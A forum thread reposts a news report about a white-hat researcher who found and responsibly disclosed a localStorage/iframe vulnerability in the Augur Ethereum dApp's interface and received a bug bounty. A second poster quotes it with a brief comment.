Mazda3 Posted August 9, 2018 #1 Posted August 9, 2018 The white hacker found a serious vulnerability in the decentralized market for Augur forecasts, perhaps the most widespread decentralized application (dApp) built on the Ethereum network. The error described on the Bugy Bounty HackerOne platform by security researcher Vyacheslav Snezhkov would allow an attacker to introduce fraudulent data into Augur's user interface, potentially leading to a significant loss of funds from the affected users. The exploit became possible due to the fact that while the main functionality of Augur is provided by the decentralized blocking Ethereum, the UI configuration files are stored locally on the user's computer. Consequently, hackers can run malicious websites that include hidden frames and, without the user's knowledge, change the configuration settings stored in these local files, so Augur's user interface will serve fraudulent data, potentially deceiving the user when sending funds to a controlled hacker address. It is important to note that the error was not in the Augur smart contract, as was the case with the loud incidents of Parity and DAO. However, this does not mean that the vulnerability was not serious. As explained Snezhkov: "A third-party site may include a hidden iframe that overrides the augur-node configuration variable to run the augur application. This variable is stored in localStorage. If the browser page reloads (user action or browser / OS failure), the normal endpoint of the "Augur-node" Web sites will be replaced with the one provided by the attacker so that all data, addresses and transactions in the markets can be disguised. " After examining the open vulnerability of Snezhkov, namely, whether it is a user interface error or something more serious, the Forecast Foundation, which controls the development of the Augur protocol, eventually awarded the hacker $ 5000. Currently, there is no indication that the vulnerability was successfully used to steal funds. Nevertheless, Forecast Foundation recommended users to upgrade to the latest version of the software, especially after the vulnerability information has become public. A source: https://www.ccn.com/white-hat-hacker-finds-major-vulnerability-in-ethereum-dapp-augur/
Kate Posted August 9, 2018 #2 Posted August 9, 2018 2 hours ago, Mazda3 said: The white hacker found a serious vulnerability in the decentralized market for Augur forecasts, perhaps the most widespread decentralized application (dApp) built on the Ethereum network. The error described on the Bugy Bounty HackerOne platform by security researcher Vyacheslav Snezhkov would allow an attacker to introduce fraudulent data into Augur's user interface, potentially leading to a significant loss of funds from the affected users. The exploit became possible due to the fact that while the main functionality of Augur is provided by the decentralized blocking Ethereum, the UI configuration files are stored locally on the user's computer. Consequently, hackers can run malicious websites that include hidden frames and, without the user's knowledge, change the configuration settings stored in these local files, so Augur's user interface will serve fraudulent data, potentially deceiving the user when sending funds to a controlled hacker address. It is important to note that the error was not in the Augur smart contract, as was the case with the loud incidents of Parity and DAO. However, this does not mean that the vulnerability was not serious. As explained Snezhkov: "A third-party site may include a hidden iframe that overrides the augur-node configuration variable to run the augur application. This variable is stored in localStorage. If the browser page reloads (user action or browser / OS failure), the normal endpoint of the "Augur-node" Web sites will be replaced with the one provided by the attacker so that all data, addresses and transactions in the markets can be disguised. " After examining the open vulnerability of Snezhkov, namely, whether it is a user interface error or something more serious, the Forecast Foundation, which controls the development of the Augur protocol, eventually awarded the hacker $ 5000. Currently, there is no indication that the vulnerability was successfully used to steal funds. Nevertheless, Forecast Foundation recommended users to upgrade to the latest version of the software, especially after the vulnerability information has become public. A source: https://www.ccn.com/white-hat-hacker-finds-major-vulnerability-in-ethereum-dapp-augur/ Nice to hear the Hacker didnt abuse the system with this
Featured Comment
Archived
This topic is now archived and is closed to further replies.